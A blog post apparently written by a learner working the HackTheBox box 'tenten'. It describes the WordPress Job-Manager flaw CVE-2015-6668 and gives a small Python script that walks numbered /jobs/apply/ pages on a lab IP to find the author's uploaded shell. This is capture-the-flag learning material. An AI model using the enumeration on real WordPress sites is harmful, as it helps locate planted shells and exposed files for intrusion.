WordPress Job-Manager CVE-2015-6668

by Vince
in Blog
Hits: 2205

Lately, I've been playing around on HackTheBox to expand my game.  I find the platform to be challenging because the Capture the Flag style hacking is another world to me.  I frequently see people writing "this is easy" when referring to a specific box or challenge but I think it's only easy if you know how to do "something".  For example, I know next to nothing about steganography and when I came across an image with a hidden message, I had no idea what tool to use for the problem.  But then you discover a tool like steghide and all of the sudden, it IS "easy" -- as they say.  Moving on....

I've been working my way through some of the easier boxes in both the Active and Retired section and my recent project is tenten which is when I came across the WordPress Job-Manager vulnerability.  I've said this previously, I'm a Python n00b but I learn from doing.  This seemed like a great opportunity because I needed to parse through a bunch of pages -- grabbing the title from each page.  Essentially, at this point in the process of working my way through this box, I'm trying to find my uploaded shell.

If you're not familiar with this box or vulnerability, here's a visual:



Note in the URL, we have /apply/1

We have an unknown number and somewhere we will find our uploaded shell.  In the address bar, we could literally replace 1 with 2, then 2 with 3, etc., etc., or we could script this in Python.  It's probably not pretty but it works:  


#!/usr/bin/python
import requests
host='http://10.10.10.10/index.php/jobs/apply/'
a = 0
while a < 20:
    a +=1
    combined = host+str(a)
    r = requests.get(combined)
    for line in r :
        if "<title>" in line:
            head, sep, tail = line.partition('&#8211;')
            print 'Title' + str(a) + ': ' + (head[96:116])

 

Our script will run through /apply/1 through /apply/20.  It will search for the HTML <title> tag, it will start printing at 96 characters, end printing at 116 characters and it will terminate when it sees &#8211;.  Our result is this:



Title20 is my shell and Title13 is a hint for those attempting this box.  :)